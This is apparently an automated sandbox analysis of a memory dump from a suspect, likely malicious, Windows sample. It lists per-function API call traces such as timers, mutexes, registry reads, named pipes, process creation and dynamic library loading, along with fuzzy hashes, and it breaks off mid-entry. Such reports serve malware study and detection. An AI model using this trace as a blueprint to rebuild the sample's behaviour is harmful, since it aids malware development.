Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: fad95d919eac27cd34aa10191771267fafd6cb732027d2b6ef5d1a24d1611499
Instruction ID: ff697fdba48bb666423da445aa4f4cbb4d6c224a35fccc67f71a36e9f444b207
Opcode Fuzzy Hash: fad95d919eac27cd34aa10191771267fafd6cb732027d2b6ef5d1a24d1611499
Instruction Fuzzy Hash: 7E4105B590020AEFDF15EFA1DCC4AAEFBB8EF00301F2485A5F811AA164DB719A54DF50

Uniqueness

Uniqueness Score: -1.00%

Function 03346F3E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03346F60

Part of subcall function 0336186D: RtlNtStatusToDosError.NTDLL(00000000), ref: 033618A5
Part of subcall function 0336186D: SetLastError.KERNEL32(00000000), ref: 033618AC

GetLastError.KERNEL32(?,00000318,00000008), ref: 03347070

Part of subcall function 033562DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 033562F4

memcpy.NTDLL(00000218,03369D50,00000100,?,00010003,?,?,00000318,00000008), ref: 03346FEF
RtlNtStatusToDosError.NTDLL(00000000), ref: 03347049

Strings

, xrefs: 03346FB6

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 185b1d3bb97daabcad29b77daf64faa912630f2d9362126081a6e1c0c99d2545
Instruction ID: 70e6222dd27f1a4bd93328bc5184c716b17d6af431798d1c6d0a14ef9e431617
Opcode Fuzzy Hash: 185b1d3bb97daabcad29b77daf64faa912630f2d9362126081a6e1c0c99d2545
Instruction Fuzzy Hash: F3317AB190130AAFDB20DFA4DDC4AAAB7F8EB04304F1445AAE55AE7650E734FA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03349F02, Relevance: 7.9, APIs: 6, Instructions: 401COMMON

Download Yara Rule

APIs

Part of subcall function 03351985: memset.NTDLL ref: 033519A5

Part of subcall function 03351985: memset.NTDLL ref: 03351ADA
Part of subcall function 03351985: memset.NTDLL ref: 03351AEF

memcpy.NTDLL(?,?,0000011E), ref: 03349F88
memset.NTDLL ref: 03349FBE
memset.NTDLL ref: 0334A00C
memset.NTDLL ref: 0334A08B
memset.NTDLL ref: 0334A0FA
memset.NTDLL ref: 0334A1CA

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: b973baebde4f4269126e0f5d8f402c332309a08739b1f7eb9c15d59f7159a47e
Instruction ID: 0d86d444f2ba4fef14595ab1b93c86050306cda2f06e172be06d0124557b6672
Opcode Fuzzy Hash: b973baebde4f4269126e0f5d8f402c332309a08739b1f7eb9c15d59f7159a47e
Instruction Fuzzy Hash: 59F1CF34904B99CFDB31CF69C9D46AABBF8BF41304F1449ADC9D796681E232BA45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 033551EC, Relevance: 54.4, APIs: 36, Instructions: 446synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 033421AA: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 033421DE
Part of subcall function 033421AA: GetLastError.KERNEL32(?), ref: 0334229F
Part of subcall function 033421AA: ReleaseMutex.KERNEL32(00000000), ref: 033422A8

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0335528A

Part of subcall function 03359F4D: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03359F67
Part of subcall function 03359F4D: CreateWaitableTimerA.KERNEL32(03371248,00000003,?), ref: 03359F84
Part of subcall function 03359F4D: GetLastError.KERNEL32(?,?,03342212,?), ref: 03359F95
Part of subcall function 03359F4D: GetSystemTimeAsFileTime.KERNEL32(?,00000000,03342212,?,?,?,03342212,?), ref: 03359FD5
Part of subcall function 03359F4D: SetWaitableTimer.KERNEL32(?,03342212,00000000,00000000,00000000,00000000,?,?,03342212,?), ref: 03359FF4
Part of subcall function 03359F4D: HeapFree.KERNEL32(00000000,03342212,00000000,03342212,?,?,?,03342212,?), ref: 0335A00A

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 033552ED
StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 03355369
StrTrimA.SHLWAPI(00000000,?), ref: 0335538B
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 033553CB

Part of subcall function 033658F2: RtlAllocateHeap.NTDLL(00000000,00000010,74E5F730), ref: 03365914
Part of subcall function 033658F2: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?,?,?,?,033552C3,?), ref: 03365942

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 03355471
CloseHandle.KERNEL32(?), ref: 03355700

Part of subcall function 033606F3: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,03355493,?), ref: 033606FF
Part of subcall function 033606F3: HeapFree.KERNEL32(00000000,?,?,?,?,?,03355493,?), ref: 0336072D
Part of subcall function 033606F3: ResetEvent.KERNEL32(?,?,?,?,?,03355493,?), ref: 03360747

WaitForSingleObject.KERNEL32(?,00000000,?), ref: 033554A6
WaitForSingleObject.KERNEL32(?,00000000), ref: 033554B5
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 033554E2
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 033554FC
_allmul.NTDLL(0000012C,00000000,FF676980,000000FF), ref: 03355544
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000012C,00000000,FF676980,000000FF,00000000), ref: 0335555E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03355574
ReleaseMutex.KERNEL32(?), ref: 03355591
WaitForSingleObject.KERNEL32(?,00000000), ref: 033555A2
WaitForSingleObject.KERNEL32(?,00000000), ref: 033555B1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 033555E5
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 033555FF
SwitchToThread.KERNEL32 ref: 03355601
ReleaseMutex.KERNEL32(?), ref: 0335560B
WaitForSingleObject.KERNEL32(?,00000000), ref: 03355649
WaitForSingleObject.KERNEL32(?,00000000), ref: 03355654
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03355677
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 03355691
SwitchToThread.KERNEL32 ref: 03355693
ReleaseMutex.KERNEL32(?), ref: 0335569D
WaitForSingleObject.KERNEL32(?,00000000), ref: 033556B2
CloseHandle.KERNEL32(?), ref: 03355714
CloseHandle.KERNEL32(?), ref: 03355720
CloseHandle.KERNEL32(?), ref: 0335572C
CloseHandle.KERNEL32(?), ref: 03355738
CloseHandle.KERNEL32(?), ref: 03355744
CloseHandle.KERNEL32(?), ref: 03355750
CloseHandle.KERNEL32(?), ref: 0335575C
RtlExitUserThread.NTDLL(00000000), ref: 0335576B

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
String ID:
API String ID: 2369282788-0
Opcode ID: c616ef466eb13e55bac8cab9bf0e4f37aa9c30fd7c49e6da2515142a619cd4db
Instruction ID: 6904c6b7e806ae8175b68bc4f0c18d1cd63a106c0d10f617b0fea35766ba1fed
Opcode Fuzzy Hash: c616ef466eb13e55bac8cab9bf0e4f37aa9c30fd7c49e6da2515142a619cd4db
Instruction Fuzzy Hash: D8F16072808344AFE721EF64CCC4D6ABBEDEB89364F044A29F996D6194D770EC448F52

Uniqueness

Uniqueness Score: -1.00%

Function 0335825F, Relevance: 42.3, APIs: 28, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 03358280
GetTickCount.KERNEL32 ref: 0335829A
wsprintfA.USER32 ref: 033582ED
QueryPerformanceFrequency.KERNEL32(?), ref: 033582F9
QueryPerformanceCounter.KERNEL32(?), ref: 03358304
_aulldiv.NTDLL(?,?,?,?), ref: 0335831A
wsprintfA.USER32 ref: 03358330
wsprintfA.USER32 ref: 03358355
HeapFree.KERNEL32(00000000,?), ref: 03358368
wsprintfA.USER32 ref: 0335838C
HeapFree.KERNEL32(00000000,?), ref: 0335839F
wsprintfA.USER32 ref: 033583D9
wsprintfA.USER32 ref: 033583FD
lstrcat.KERNEL32(?,?), ref: 03358435
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0335844F
GetTickCount.KERNEL32 ref: 0335845F
RtlEnterCriticalSection.NTDLL(0644C0A0), ref: 03358473
RtlLeaveCriticalSection.NTDLL(0644C0A0), ref: 03358491
StrTrimA.SHLWAPI(00000000,0336B3F8,00000000,0644C0E0), ref: 033584CA
lstrcpy.KERNEL32(00000000,?), ref: 033584EC
lstrcpy.KERNEL32(00000000,00000000), ref: 033584F3
lstrcat.KERNEL32(00000000,?), ref: 033584FA
lstrcat.KERNEL32(00000000,?), ref: 03358501
HeapFree.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000001), ref: 0335857C
HeapFree.KERNEL32(00000000,?,00000000), ref: 0335858E
HeapFree.KERNEL32(00000000,00000000,00000000,0644C0E0), ref: 0335859D
HeapFree.KERNEL32(00000000,00000000), ref: 033585AF
HeapFree.KERNEL32(00000000,?), ref: 033585C1

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
String ID:
API String ID: 3373977504-0
Opcode ID: 282ecd7ced883b047c5d51e9d081b854a4a42cab7dfb232cc6f983cdf9f676b9
Instruction ID: 12b78715ab7d8711ab7b52b5beaa14a2c197ca5486f85df0df8f728e97c01d89
Opcode Fuzzy Hash: 282ecd7ced883b047c5d51e9d081b854a4a42cab7dfb232cc6f983cdf9f676b9
Instruction Fuzzy Hash: 54A18976A04205EFDB21EFA9DCC4E5A7BADFB48304F044429F908CA264D739D959CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0334C7CC, Relevance: 33.2, APIs: 22, Instructions: 250memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0334C802
wsprintfA.USER32 ref: 0334C86A
wsprintfA.USER32 ref: 0334C8B0
wsprintfA.USER32 ref: 0334C8D1
lstrcat.KERNEL32(00000000,?), ref: 0334C902
wsprintfA.USER32 ref: 0334C92F
HeapFree.KERNEL32(00000000,?), ref: 0334C942
wsprintfA.USER32 ref: 0334C961
HeapFree.KERNEL32(00000000,?), ref: 0334C972
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0334C98C
RtlEnterCriticalSection.NTDLL(0644C0A0), ref: 0334C9A5
RtlLeaveCriticalSection.NTDLL(0644C0A0), ref: 0334C9C3

Part of subcall function 0335D91E: lstrlen.KERNEL32(00000000,?,00000000,7691C740,74E481D0,?,?,033584A7,00000000,0644C0E0), ref: 0335D949
Part of subcall function 0335D91E: lstrlen.KERNEL32(?,?,?,033584A7,00000000,0644C0E0), ref: 0335D951
Part of subcall function 0335D91E: strcpy.NTDLL ref: 0335D968
Part of subcall function 0335D91E: lstrcat.KERNEL32(00000000,?), ref: 0335D973
Part of subcall function 0335D91E: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,033584A7,00000000,0644C0E0), ref: 0335D990

StrTrimA.SHLWAPI(00000000,0336B3F8,00000000,0644C0E0), ref: 0334C9F9

Part of subcall function 03355E27: lstrlen.KERNEL32(06448560,00000000,00000000,74E481D0,033584D6,00000000), ref: 03355E37
Part of subcall function 03355E27: lstrlen.KERNEL32(?), ref: 03355E3F
Part of subcall function 03355E27: lstrcpy.KERNEL32(00000000,06448560), ref: 03355E53
Part of subcall function 03355E27: lstrcat.KERNEL32(00000000,?), ref: 03355E5E

lstrcpy.KERNEL32(00000000,?), ref: 0334CA1C
lstrcpy.KERNEL32(00000000,00000000), ref: 0334CA23
lstrcat.KERNEL32(00000000,?), ref: 0334CA30
lstrcat.KERNEL32(00000000,?), ref: 0334CA37
HeapFree.KERNEL32(00000000,?), ref: 0334CAB7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0334CAC6
HeapFree.KERNEL32(00000000,00000000,00000000,0644C0E0), ref: 0334CAD1
HeapFree.KERNEL32(00000000,00000000), ref: 0334CADF
HeapFree.KERNEL32(00000000,00000000), ref: 0334CAEA

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$lstrcatwsprintf$lstrlen$lstrcpy$AllocateCriticalSectionTrim$EnterLeavestrcpy
String ID:
API String ID: 697741160-0
Opcode ID: fe57390025a1db7a3648a3c66da9ef3bf16c276513ee8ea87c2405c203df1783
Instruction ID: a0127ced081f96f93d1f9a0fb2b8f0f80ba47b06369861b9ecfb256cc4de29f5
Opcode Fuzzy Hash: fe57390025a1db7a3648a3c66da9ef3bf16c276513ee8ea87c2405c203df1783
Instruction Fuzzy Hash: 3B918536901205AFD761EBA9DCC4F1ABBECEB48314F080459F949DA264D738E849CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03354306, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03354322
RtlAllocateHeap.NTDLL(00000000,?), ref: 0335433E
GetLastError.KERNEL32 ref: 0335438D
HeapFree.KERNEL32(00000000,00000000), ref: 033543A3
RtlAllocateHeap.NTDLL(00000000,?), ref: 033543B7
GetLastError.KERNEL32 ref: 033543D1
GetLastError.KERNEL32 ref: 03354404
HeapFree.KERNEL32(00000000,00000000), ref: 03354422
lstrlenW.KERNEL32(00000000,?), ref: 0335444E
RtlAllocateHeap.NTDLL(00000000,?), ref: 03354463
DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 03354537
HeapFree.KERNEL32(00000000,?), ref: 03354546
WaitForSingleObject.KERNEL32(00000000), ref: 0335455B
HeapFree.KERNEL32(00000000,00000000), ref: 0335456E
HeapFree.KERNEL32(00000000,?), ref: 03354580
RtlExitUserThread.NTDLL(?,?), ref: 03354595

Strings

, xrefs: 03354447

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
String ID:
API String ID: 3853681310-3916222277
Opcode ID: 45b0beac6a4c24077160ed1a67e404b9daad30b71950ad5590682fe6962af98f
Instruction ID: a257d4287806ab468b98b84b224a8cc1802f318afbd7fc5e0ab087f6d69a2fb1
Opcode Fuzzy Hash: 45b0beac6a4c24077160ed1a67e404b9daad30b71950ad5590682fe6962af98f
Instruction Fuzzy Hash: F4812876900219EFDB20EFA2DCC8EAEBBBCEB08301F044469F901D7254D7749A959F60

Uniqueness

Uniqueness Score: -1.00%

Function 03351C4D, Relevance: 27.3, APIs: 18, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03344C22: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,03341F86,?), ref: 03344C5A
Part of subcall function 03344C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 03344C6E
Part of subcall function 03344C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,03341F86,?,?,?), ref: 03344C88
Part of subcall function 03344C22: RegCloseKey.ADVAPI32(?,?,?,?,03341F86,?,?,?), ref: 03344CB2

HeapFree.KERNEL32(00000000,?,?,?,?), ref: 03351C94
RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 03351CB2
HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 03351CDE
HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,?), ref: 03351D4C
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03351DC4
wsprintfA.USER32 ref: 03351DE0
lstrlen.KERNEL32(00000000,00000000), ref: 03351DEB
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03351E02
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03351E8E
wsprintfA.USER32 ref: 03351EA9
lstrlen.KERNEL32(00000000,00000000), ref: 03351EB4
HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03351ECB
HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,?,00000000,?,?,?), ref: 03351EED
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 03351F08
wsprintfA.USER32 ref: 03351F1F
lstrlen.KERNEL32(00000000,00000000), ref: 03351F2A

Part of subcall function 0336715A: lstrlen.KERNEL32(033494DB,00000000,?,?,?,?,033494DB,00000035,00000000,?,00000000), ref: 0336718A
Part of subcall function 0336715A: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 033671A0
Part of subcall function 0336715A: memcpy.NTDLL(00000010,033494DB,00000000,?,?,033494DB,00000035,00000000), ref: 033671D6
Part of subcall function 0336715A: memcpy.NTDLL(00000010,00000000,00000035,?,?,033494DB,00000035), ref: 033671F1
Part of subcall function 0336715A: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0336720F
Part of subcall function 0336715A: GetLastError.KERNEL32(?,?,033494DB,00000035), ref: 03367219
Part of subcall function 0336715A: HeapFree.KERNEL32(00000000,00000000,?,?,033494DB,00000035), ref: 0336723C

HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 03351F41
HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06448A20), ref: 03351F6D

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
String ID:
API String ID: 3130754786-0
Opcode ID: b4dd40aa59bb926472062c133419490688fbfc62673c38a991befd13f13fd665
Instruction ID: 8cf6c5f9cff715967a42ebdcba2bfc6a9e385a3082774e048fbe98eac0455e44
Opcode Fuzzy Hash: b4dd40aa59bb926472062c133419490688fbfc62673c38a991befd13f13fd665
Instruction Fuzzy Hash: 0AA132B6D00219EFEF21EF95CCC4EAEBBBDEB08304F04456AF915A6224D7355E448B61

Uniqueness

Uniqueness Score: -1.00%

Function 0334BF5B, Relevance: 24.1, APIs: 16, Instructions: 131memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0334BF7D
RtlEnterCriticalSection.NTDLL(00000000), ref: 0334BF9A
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0334BFEA
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0334BFF4
GetLastError.KERNEL32 ref: 0334BFFE
HeapFree.KERNEL32(00000000,00000000), ref: 0334C00F
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0334C031
HeapFree.KERNEL32(00000000,?), ref: 0334C068
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0334C07C
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0334C085
SuspendThread.KERNEL32(?), ref: 0334C094
CreateEventA.KERNEL32(03371248,00000001,00000000), ref: 0334C0A8
SetEvent.KERNEL32(00000000), ref: 0334C0B5
CloseHandle.KERNEL32(00000000), ref: 0334C0BC
Sleep.KERNEL32(000001F4), ref: 0334C0CF
ResumeThread.KERNEL32(?), ref: 0334C0F3

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID:
API String ID: 1011176505-0
Opcode ID: 94a537286df42915446c688fff147b897bed40a6e13a69d87e58fe14f6d5a1f0
Instruction ID: 4f84e3af1648a9f63ec1415e8228fb885211ec83dae3835b33c0a446032e20e6
Opcode Fuzzy Hash: 94a537286df42915446c688fff147b897bed40a6e13a69d87e58fe14f6d5a1f0
Instruction Fuzzy Hash: EB413A72900609FFCB20AFA5ECC89AEFBBDFB04344F048169E506E2114D739AA959F50

Uniqueness

Uniqueness Score: -1.00%

Function 03342FD5, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

memset.NTDLL ref: 03343003
StrChrA.SHLWAPI(?,0000000D), ref: 03343049
StrChrA.SHLWAPI(?,0000000A), ref: 03343056
StrChrA.SHLWAPI(?,0000007C), ref: 0334307D
StrTrimA.SHLWAPI(?,0336D49C), ref: 03343092
StrChrA.SHLWAPI(?,0000003D), ref: 0334309B
StrTrimA.SHLWAPI(00000001,0336D49C), ref: 033430B1
_strupr.NTDLL ref: 033430B8
StrTrimA.SHLWAPI(?,?), ref: 033430C5
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0334310D
lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0334312C

Strings

, xrefs: 033430BD
;, xrefs: 0334306B

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 8be2ceb36f1458ba1b5d29a26d85d0103cf6dbf0f6b7d3b08db05bac428ef3f3
Instruction ID: 5a4d1b6876f5d0af9db11a00edee3c80e5a36a26fdd2bd2fbf47646f4d9bd3b4
Opcode Fuzzy Hash: 8be2ceb36f1458ba1b5d29a26d85d0103cf6dbf0f6b7d3b08db05bac428ef3f3
Instruction Fuzzy Hash: DC412079608306AFD721EF298CC4B2BBBECAF45610F084819F495CB255DB74F909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0335241D, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03352432

Part of subcall function 0335A406: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0334D4C8,?,00000000,-00000007,0335F475,-00000007,?,00000000), ref: 0335A415
Part of subcall function 0335A406: mbstowcs.NTDLL ref: 0335A431

lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 0335246B
wcstombs.NTDLL ref: 03352475
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 033524A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03347B15), ref: 033524D2
TerminateProcess.KERNEL32(?,000003E5), ref: 033524E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03347B15), ref: 033524FC
GetLastError.KERNEL32 ref: 03352500
GetExitCodeProcess.KERNEL32(?,00000001), ref: 03352520
CloseHandle.KERNEL32(?), ref: 0335252F
CloseHandle.KERNEL32(?), ref: 03352534
GetLastError.KERNEL32 ref: 03352538

Strings

D, xrefs: 03352446

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D
API String ID: 2463014471-2746444292
Opcode ID: 89bd43374730ed11a1e484b64d23479a8eef845e06236c960b1f975342e0d03d
Instruction ID: 9468f59fc7a7f4b60b5c25dcf302fd2920d48646df0011730e00af8f50b5bf20
Opcode Fuzzy Hash: 89bd43374730ed11a1e484b64d23479a8eef845e06236c960b1f975342e0d03d
Instruction Fuzzy Hash: 4741F4B6D00218BFDB11EFA5CDC5DAEFBBCEB08245F248869F901E6100E7759E449B60

Uniqueness

Uniqueness Score: -1.00%

Function 0334B4E1, Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00000000), ref: 0334B4F8
lstrlen.KERNEL32(?,?,00000000), ref: 0334B4FF
RtlAllocateHeap.NTDLL(00000000,?), ref: 0334B516
lstrcpy.KERNEL32(00000000,?), ref: 0334B527
lstrcat.KERNEL32(?,?), ref: 0334B543
lstrcat.KERNEL32(?,?), ref: 0334B554
RtlAllocateHeap.NTDLL(00000000,?), ref: 0334B565
RtlAllocateHeap.NTDLL(00000000,?), ref: 0334B602
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0334B63B
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0334B654
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0334B65E
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0334B66E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0334B687
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0334B697

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID:
API String ID: 333890978-0
Opcode ID: b29a826da6e2b10820d5c75d70d5352c75841b34cc205c09f0d571d758428bb5
Instruction ID: 1a4b3037ae1f10eb6387da15cb9cb273375a5c92f11b382ee31c73707ea49f70
Opcode Fuzzy Hash: b29a826da6e2b10820d5c75d70d5352c75841b34cc205c09f0d571d758428bb5
Instruction Fuzzy Hash: 22516976800109FFDB21AFA5CCC8CAEBBBDEB49354B15846AFA15D7120D7399A05CF60

Uniqueness

Uniqueness Score: -1.00%

Function 033480F1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 03348133
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 03348146
CloseHandle.KERNEL32(00000000), ref: 0334825E

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

memset.NTDLL ref: 03348169
memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 033481E8
RtlEnterCriticalSection.NTDLL(?), ref: 033481FD
RtlLeaveCriticalSection.NTDLL(?), ref: 03348215
GetLastError.KERNEL32(03366330,?,?,?,?,?,?,?,00000040), ref: 0334822D
RtlEnterCriticalSection.NTDLL(?), ref: 03348239
RtlLeaveCriticalSection.NTDLL(?), ref: 03348248

Strings

0x%08X, xrefs: 03348105
W, xrefs: 03348264

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
String ID: 0x%08X$W
API String ID: 1559661116-2600449260
Opcode ID: 93f255589a74ca6743a666d2665287ce08a27e4119883f5cdbf46e2687354b72
Instruction ID: f5cbdab2bcec8be99ff3a06aa466560ed61193814555f92cb83506971b9ccac5
Opcode Fuzzy Hash: 93f255589a74ca6743a666d2665287ce08a27e4119883f5cdbf46e2687354b72
Instruction Fuzzy Hash: C6413CB1900709EFDB10EFA5C984A9EBBFCFF08344F108529E659EB250D375AA54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03348BDD, Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,033564E2,?,?), ref: 03348BEA

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,033564E2,?,?), ref: 03348C13
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 03348C33
lstrcpyW.KERNEL32(-00000002,?), ref: 03348C4F
SetCurrentDirectoryW.KERNEL32(?,?,?,?,033564E2,?,?), ref: 03348C5B
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,033564E2,?,?), ref: 03348C5E
SetCurrentDirectoryW.KERNEL32(74E068C0,?,?,?,033564E2,?,?), ref: 03348C6A
GetProcAddress.KERNEL32(00000000,?), ref: 03348C87
GetProcAddress.KERNEL32(00000000,?), ref: 03348CA1
GetProcAddress.KERNEL32(00000000,?), ref: 03348CB7
GetProcAddress.KERNEL32(00000000,?), ref: 03348CCD
GetProcAddress.KERNEL32(00000000,?), ref: 03348CE3
GetProcAddress.KERNEL32(00000000,?), ref: 03348CF9
FreeLibrary.KERNEL32(00000000,?,?,?,033564E2,?,?), ref: 03348D22

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

